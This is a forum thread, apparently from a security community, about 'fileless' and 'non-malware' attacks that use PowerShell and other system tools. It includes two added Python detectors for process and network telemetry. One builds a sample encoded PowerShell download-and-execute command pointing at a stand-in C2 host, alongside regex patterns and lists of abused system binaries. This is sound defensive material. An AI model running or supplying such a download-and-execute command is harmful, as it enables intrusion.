
Non-malware attacks


sman


https://zeltser.com/fileless-malware-beyond-buzzword/

Quote

In contrast, a reasonable alternative to the term fileless malware was introduced by Carbon Black in its 2016 Threat Report. The report used the phrase non-malware attacks. Writing on the company’s blog a few months later, Michael Viscuso explained the meaning of this term like this:

“A non-malware attack is one in which an attacker uses existing software, allowed applications and authorized protocols to carry out malicious activities. Non-malware attacks are capable of gaining control of computers without downloading any malicious files, hence the name. Non-malware attacks are also referred to as fileless, memory-based or ‘living-off-the-land’ attacks.”

Gartner used the term “non-malware attack” in a 2017 report that highlighted Carbon Black. However, another Gartner report published a month later used “fileless attacks” instead.

Why Does It Matter?

I like the idea of saying “non-malware attacks” for incidents that rely solely on legitimate system administration tools and other non-malicious software. This is the scenario that some people describe as living-off-the-land. In contrast, I might prefer to say “memory-only malware” if I need to point out that malicious code is never saved to disk, perhaps because it was injected into another process. I’m even OK with saying “fileless malware” when bringing focus on persistence mechanisms that avoid placing traditional executables on the file system.

Unfortunately, nowadays the terminology has been commingled, and we’re probably stuck with the term “fileless malware” to describe the various scenarios outlined above, despite the term’s ambiguity. Alas, human language is imprecise and always-evolving. (If we all spoke C#, perhaps the world would be a better place.)

I care about this terminology because I’m trying to avoid buzzwords and empty phrases when describing the capabilities of the anti-malware product for which I’m responsible at Minerva. It runs alongside other endpoint security tools and blocks all sorts of sneaky malware, regardless of whether its payload touches disk. I’m often asked how we handle fileless malware; I decided to perform the research above to better understand how and when I should use this term.

https://www.minerva-labs.com/

 


It can be seen as another form of exploit, yes; however, these aren't new and have been around for a while. Any "malware" that uses legitimate Windows files such as PowerShell.exe, cmd.exe, etc. and "lives in memory" can be seen as a "non-malware attack". I guess this is because malware means "malicious software", and "software" such as PowerShell isn't malicious; it is legitimate, but it can be used to infect a system.


They're only difficult to detect if the protection being used relies solely on analyzing binaries. Protections that use behavioral detection/prevention capabilities shouldn't be fooled by these tactics. I do not know about all of the possible vectors, but I know that at least a good portion of them would set off our exploit protection, thus thwarting the attack. That said, ones that strictly use a script file like a .bat or .vbs might not trigger our exploit protection, but tricking a user into manually running one of those isn't so easy these days, especially since, unlike with PE files, you can't change the icons of those file types to mislead the user. I have seen some that will use an exploited document like a PDF or Word doc to download/run such a script, but that in itself would trigger exploit protection, as would scripting through a web browser.


Here is a rather disturbing report: http://www.darkreading.com/vulnerabilities---threats/fileless-malware-takes-2016-by-storm/d/d-id/1327796

 

Quote

Fileless malware is not a revolutionary approach, but 2016 certainly saw a dramatic rise in this type of attack as the criminals worked to perfect it. A report out earlier this month from Carbon Black says that researchers have found that in the last quarter of 2016, there was a 33% rise in severe non-malware attacks compared to the first quarter. The firm reported that over a 90-day period, about one-third of organizations are likely to encounter at least one severe fileless attack.

 

https://www.carbonblack.com/2017/02/10/non-malware-fileless-attack/

Quote

Non-Malware Attack Example

Non-malware attacks leverage a robust suite of tactics and techniques to penetrate systems and steal data without using malware at all. They have grown in prevalence in recent years as attackers have developed ways to launch these attacks at large scale.

Let’s take a look at an example attack:

[image: Non_Malware_Attack.jpg]

  1. A user visits a website using Firefox, perhaps driven there from a cleverly disguised spam message.
  2. On this page, Flash is loaded. Flash is a common attack vector due to its seemingly never-ending set of vulnerabilities.
  3. Flash invokes PowerShell, an OS tool that exists on every Windows machine, and feeds it instructions through the command line — all operating in memory.
  4. PowerShell connects to a stealth command and control server, where it downloads a malicious PowerShell script that finds sensitive data and sends it to the attacker. This attack never downloads any malware.
Quote

Streaming Prevention: A New Approach to Endpoint Protection

Streaming prevention offers a fundamentally new approach to identifying and preventing cyberattacks. Current approaches used by legacy AV and machine-learning AV focus exclusively on files and do nothing to target an attacker’s behaviors.

In contrast to legacy AV and machine-learning AV, streaming prevention monitors the activity of applications and services, including communications between processes, inbound and outbound network traffic, unauthorized requests to run applications, and changes to credentials or permission levels.

Streaming prevention doesn’t just monitor individual events on an endpoint; it monitors and analyzes the relationships among events.

[image: Streaming_Prevention_NGAV_CB.jpg]

Sticking with the example above, browsing the web, running Flash and invoking PowerShell are each, in their own right, viable and necessary events, but what about when they appear as a cluster of events? It’s simply not normal behavior and, as such, can be tagged, flagged and automatically shut down by streaming prevention before the attacker can carry out objectives.

_________________________________________________

 

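The "cluster of events" idea in the Carbon Black post above, and the behavioral detection the earlier reply refers to, come down to correlating telemetry the endpoint already emits. The following is an added example, not code from Carbon Black, Malwarebytes or any of the posters: it builds process ancestry from constructed Sysmon-style process-creation events (the field names pid/ppid/image/cmdline, the PIDs and the paths are assumed for illustration), decodes the -EncodedCommand payload, and flags a scripting host whose ancestry includes a browser or document handler. A plain admin launch of PowerShell from cmd.exe is deliberately included so the rule can be seen leaving it alone.

```python
"""Streaming-prevention style correlation over process-creation telemetry.
The sample events below are constructed in the shape of Sysmon Event ID 1
fields; they are not a real capture, and PIDs/paths are illustrative."""
import base64
import re

# Constructed: the one-liner an attacker would hand to PowerShell with -Enc.
# -EncodedCommand takes base64 of the UTF-16LE script text, so build it that way.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")

EVENTS = [  # assumed field names: pid, ppid, image, cmdline
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 512, "ppid": 400, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "cmdline": "firefox.exe"},
    {"pid": 600, "ppid": 512, "image": r"C:\Program Files\Mozilla Firefox\plugin-container.exe",
     "cmdline": "plugin-container.exe"},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    # Benign: an admin's batch job launching a script from cmd.exe under explorer.
    {"pid": 800, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c backup.bat"},
    {"pid": 900, "ppid": 800, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

# Scripting hosts and download-capable system binaries worth inspecting when spawned.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
# Processes that render untrusted content and should rarely spawn a scripting host.
CONTENT_HANDLERS = {"firefox.exe", "chrome.exe", "iexplore.exe", "plugin-container.exe",
                    "winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}
# Command-line tokens typical of download-and-execute one-liners.
SUSPICIOUS = re.compile(r"(?i)(-nop\b|-noprofile|-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\b"
                        r"|-ep\s+bypass|-executionpolicy\s+bypass|\biex\b|invoke-expression"
                        r"|downloadstring|net\.webclient)")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the script text behind -Enc/-EncodedCommand, or '' if absent or undecodable."""
    m = re.search(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def indicators(cmdline):
    """Suspicious tokens found in the command line and in its decoded -Enc payload."""
    text = cmdline + " " + decode_encoded_command(cmdline)
    return sorted({" ".join(m.group(0).lower().split()) for m in SUSPICIOUS.finditer(text)})


def ancestry(pid, by_pid):
    """Image names from the process up to the root, child first; safe against PID cycles."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def analyze(events):
    """Flag scripting hosts by the combination of who spawned them and how they were invoked."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in LOLBINS:
            continue
        chain = ancestry(e["pid"], by_pid)
        handler = next((p for p in chain[1:] if p in CONTENT_HANDLERS), None)
        inds = indicators(e["cmdline"])
        if handler is None and len(inds) < 2:
            continue  # a scripting host with an ordinary parent and plain flags is normal admin work
        severity = "high" if handler and inds else "medium"
        findings.append({"pid": e["pid"], "chain": chain, "content_handler": handler,
                         "indicators": inds, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f["severity"], f["pid"], " <- ".join(f["chain"]), f["indicators"])
```

Run as a script it prints one high-severity finding, powershell.exe <- plugin-container.exe <- firefox.exe <- explorer.exe, with the decoded IEX/DownloadString tokens alongside the -NoP/-W Hidden/-Enc flags, while the backup script launched from cmd.exe produces nothing. Decoding the encoded command is the part that matters: the base64 blob is exactly what a keyword scan of the raw command line would miss.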

Once again, nothing new here. It's true that there have been more of these infections in the last 2 years or so (since 2015-2016), but decent anti-exploit programs (like Malwarebytes and Malwarebytes Anti-Exploit Beta) are able to detect and block these.


If existing tools can mitigate the risks, why so much outcry from the security experts (even Kaspersky, Symantec, etc.) on this? Why is endpoint protection said to be found wanting, and why the rise in infections of banks/financial crimes, as per https://arstechnica.com/security/2017/02/a-rash-of-invisible-fileless-malware-is-infecting-banks-around-the-globe/

Quote

A rash of invisible, fileless malware is infecting banks around the globe

Once the province of nation-sponsored hackers, in-memory malware goes mainstream.

DAN GOODIN - 2/8/2017, 2:31 PM

Quote

Now, fileless malware is going mainstream, as financially motivated criminal hackers mimic their nation-sponsored counterparts. According to research Kaspersky Lab plans to publish Wednesday, networks belonging to at least 140 banks and other enterprises have been infected by malware that relies on the same in-memory design to remain nearly invisible. Because infections are so hard to spot, the actual number is likely much higher. Another trait that makes the infections hard to detect is the use of legitimate and widely used system administrative and security tools—including PowerShell, Metasploit, and Mimikatz—to inject the malware into computer memory.

https://threatpost.com/hard-target-fileless-malware/125054/

Quote

Fileless is The Future

Concerns have triggered numerous warnings from cybersecurity organizations including one in October from the Department of Homeland Security and one in March from the New Jersey Cybersecurity and Communications Integration Cell. The NJCCIC cautioned:

“The NJCCIC assesses with high confidence that fileless and ‘non-malware’ intrusion tactics pose high risk to organizations, both public and private, and will be increasingly employed by capable threat actors intent on stealing data or establishing persistence on networks to support ongoing espionage objectives or to enable future acts of sabotage.”

When it comes to attribution, a number of threat actors’ names are commonly associated with these types of attacks. Cybercriminal and nation-state operations such as Carbanak, Duqu and FIN7 have each been suspected in memory-based malware attacks.

Last month, researchers at Morphisec released a report stating FIN7 was behind several recent incidents. One was a high-profile attack that used fileless malware targeting professionals affiliated with United States Securities and Exchange Commission filings. Kaspersky Lab said attackers who targeted 140 banks and enterprises were likely connected to the GCMAN and Carbanak groups. But, Epstein said, a wide range of less organized and less sophisticated threat actors are now leveraging fileless malware attacks.

Mitigation against these threats will take new tools and a shift in end-user awareness, Brumaghin said. For starters, security experts say disabling the use of PowerShell on networks is a good start. They also recommend monitoring more closely outbound traffic and tracing it back to applications making those requests. If Windows Notepad or Calculator are making network connections, you might have a problem, experts say.

“From the malware author side, we are expecting to see more advanced attacks,” said Mordechai Guri, chief security officer at Morphisec. “We will see more advanced obfuscation, polymorphism and injection techniques, that evade such a potential monitoring and detection.”

 

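The Threatpost advice quoted above, to watch outbound traffic and trace it back to the application making the request, can be scripted over connection telemetry. The following is an added example and not code from the article, Kaspersky, Morphisec or any poster: constructed Sysmon Event ID 3-style connection events (the pid/image/dst/port field names, the PIDs and the documentation-range addresses are assumed for illustration) are attributed to their image; programs with no business on the network are flagged outright, and script hosts are flagged when the destination falls outside an explicit list of internal ranges.

```python
"""Outbound-connection attribution: map each connection to the image that made
it, flag images that should never talk to the network, and flag scripting hosts
talking to external addresses. The events below are constructed in the shape of
Sysmon Event ID 3 (NetworkConnect) fields; they are not a real capture, and the
external addresses come from the documentation ranges."""
import ipaddress
from collections import Counter

EVENTS = [  # assumed field names: pid, image, dst, port
    {"pid": 512, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dst": "203.0.113.10", "port": 443},
    {"pid": 700, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dst": "198.51.100.23", "port": 443},
    {"pid": 900, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dst": "10.0.0.5", "port": 5985},
    {"pid": 1200, "image": r"C:\Windows\System32\notepad.exe", "dst": "198.51.100.23", "port": 8080},
    {"pid": 1300, "image": r"C:\Windows\System32\svchost.exe", "dst": "10.0.0.1", "port": 53},
]

# Programs with no legitimate reason to open sockets on a workstation.
NEVER_NETWORK = {"notepad.exe", "calc.exe", "mspaint.exe", "write.exe", "wordpad.exe"}
# Script hosts and download-capable system binaries: external connections deserve a look.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}
# Listed explicitly: ipaddress's is_private also counts the documentation ranges
# (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) as private, which would hide
# the external hits in this sample.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
    "fc00::/7", "::1/128", "fe80::/10")]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_internal(ip):
    """True when the address sits in one of the listed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def classify(event):
    """Return (severity, reason) for one connection, or (None, '') if unremarkable."""
    name = basename(event["image"])
    where = f"{event['dst']}:{event['port']}"
    if name in NEVER_NETWORK:
        return "high", f"{name} opened a connection to {where}; it has no business on the network"
    if name in SCRIPT_HOSTS and not is_internal(event["dst"]):
        return "high", f"{name} reached external host {where}"
    if name in SCRIPT_HOSTS:
        return "low", f"{name} reached internal host {where}; baseline against known admin hosts"
    return None, ""


def triage(events):
    findings = []
    for e in events:
        severity, reason = classify(e)
        if severity:
            findings.append({"pid": e["pid"], "image": basename(e["image"]),
                             "severity": severity, "reason": reason})
    return findings


def external_talkers(events):
    """Pivot: how many external connections each image made (the 'trace it back' view)."""
    return Counter(basename(e["image"]) for e in events if not is_internal(e["dst"]))


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f["severity"].upper(), f["pid"], f["reason"])
    print(dict(external_talkers(EVENTS)))
```

On a real host these fields come from Sysmon Event ID 3 or the Windows Filtering Platform audit events; the constructed list stands in for that stream. The "low" finding for PowerShell reaching an internal WinRM port is the one to baseline rather than alert on, since remote administration looks exactly like that.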

I have seen many bank ATMs that (when they crash) show that they run XP. Banks are often slack in their protection, because their upgrades are tens of thousands of computers. That's not an insignificant amount of resources required.


But a compromise of protection would only be an invitation for more trouble, as businesses are bound to suffer, what with client compensation that could cripple them; and here, in this threat scenario, it's not about ATMs but about banking setups being hit (which is the disturbing fact).


Quote

why so much outcry by the security experts (even Kaspersky, Symantec etc.) on this?.. why endpoint protection is said to be found wanting and the rise in infection of banks/financial crimes

It's the same thing with ransomware. Ransomware was already a thing before CryptoLocker, but it took a massive campaign for the world to notice that "new" threat.


Unfortunately many Point Of Sale (POS) systems, bank ATMs and other machines used for financial transactions are still outdated. I see them all the time still running XP as mentioned above, and I still see a few every once in a while still running Windows 2000.

As for why all the noise, look at the majority of major AVs. The last time I checked, most don't have robust exploit detection/prevention technology. That's why you still see so many articles about exploits recommending MBAE/Malwarebytes 3 as well as EMET and HitmanPro.Alert, because the exploit protection provided by most AVs just isn't cutting it. They still seem more concerned with detecting binaries and doing well on synthetic tests, which seldom ever test against live/in-the-wild exploits.


But if it's to do with sticking to XP, why haven't the reports/articles referred to said so?

Quote

Using Good Tools for Bad Purposes

Attackers can also get more aggressive and turn to other forensic and penetration-testing tools such as Metasploit or Mimikatz, that allow you to either inject code into system memory or read data stored in memory. These open-source tools, along with others such as Lazagne, and Meterpreter, allow attackers to probe deeper into targeted systems, steal credentials and open reverse shells back to the adversary’s control server.

Would like to see the blocking of these exploit kits, to see the effectiveness. It is not that exploit tools are not embraced by AVs; Norton, ESET, etc. come with exploit protection too (which caused compatibility issues during the MBAE testing phase).



As I pointed out, it's not about XP being targeted; other versions are too, as in http://www.removemalwarevirus.com/learn-easy-solution-to-remove-fileless-malware-quickly

 

Quote

Information About Fileless Malware

Fileless Malware is basically a stubborn Trojan infection that has been reported to be more enhanced and improved compared to its predecessors. Now, as the threat name simply reflects, this infection does not make use of any type of file in carrying out the infection procedure. Being compatible with almost all versions of Windows OS, i.e., Windows XP/Vista/7/8/10, this infection makes its existence only in memory instead of on the compromised system's hard drive. It is scripted directly into the RAM. Moreover, this code is injected into several running processes, including iexplore.exe or javaw.exe, which are then further utilized for the exploit.

So, when banks are targeted and hit, it is a serious concern not only about banking dealings but about the vulnerability of systems in general to such attacks.

